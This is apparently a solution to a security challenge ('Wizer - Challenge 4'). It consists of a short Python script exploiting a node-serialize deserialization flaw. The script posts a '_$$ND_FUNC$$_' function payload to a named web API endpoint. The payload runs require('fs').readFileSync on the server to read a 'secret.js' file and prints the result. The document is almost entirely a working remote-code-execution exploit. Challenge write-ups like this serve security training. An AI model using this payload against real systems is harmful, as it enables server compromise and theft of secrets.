Wizer - Challenge 4 - node-serialize RCE

Exploit

import requests

url = "https://movies-rosy-three.vercel.app/api/movies"


# Get the secret key from file 'secret.js'

r = requests.post(
    url,
    json={
        "message": "_$$ND_FUNC$$_function (){ return require('fs').readFileSync('/var/task/.next/server/pages/api/secret.js'); }()",
        "fieldName": "_id",
        "fieldValue": "aa"
    },
)

print(r.text)